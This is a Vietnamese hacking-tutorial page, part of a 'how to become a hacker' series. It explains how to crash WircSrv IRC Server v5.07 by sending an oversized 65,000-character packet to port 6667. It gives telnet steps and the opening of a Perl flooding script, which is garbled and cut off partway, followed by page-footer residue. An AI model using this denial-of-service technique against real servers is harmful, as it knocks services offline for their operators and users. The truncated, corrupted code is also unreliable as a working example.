Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 7

42. Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 :

WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port 6667.
Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667:

Nếu bạn dùng Unix:

[hellme@die-communitech.net$ telnet irc.example.com 6667
Trying example.com...
Connected to example.com.
Escape character is `^]`.
[buffer]

Windows cũng tương tự:

telnet irc.example.com 6667

Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự.

Tuy nhiên, chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau (Các bạn hãy nhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó, đó cũng là một trong những cách tập luyện cho sự phản xạ của các hacker khi họ nghiên cứu. Nào, chúng ta hãy phân tích nó một cách căn bản):

CODE

#!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các lệnh trong perl
use Getopt::Std;
use Socket;
getopts(`s:`, \%args);
if(!defined($args{s})){&usage;}
my($serv,$port,$foo,$number,$data,$buf,$in_addr,$pa ddr,$proto);
$foo = ``A``; # Đây là NOP
$number = ``65000``; # Đây là tất cả số NOP
$data .= $foo x $number; # kết quả của $foo times $number
$serv = $args{s}; # lệnh điều khiển server từ xa
$port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là 6667
$buf = ``$data``;
$in_addr = (gethostbyname($serv))[4] </no />
Thứ Ba, 25/08/2020 11:40
4,613 👨 7.832
0 Bình luận
Sắp xếp theo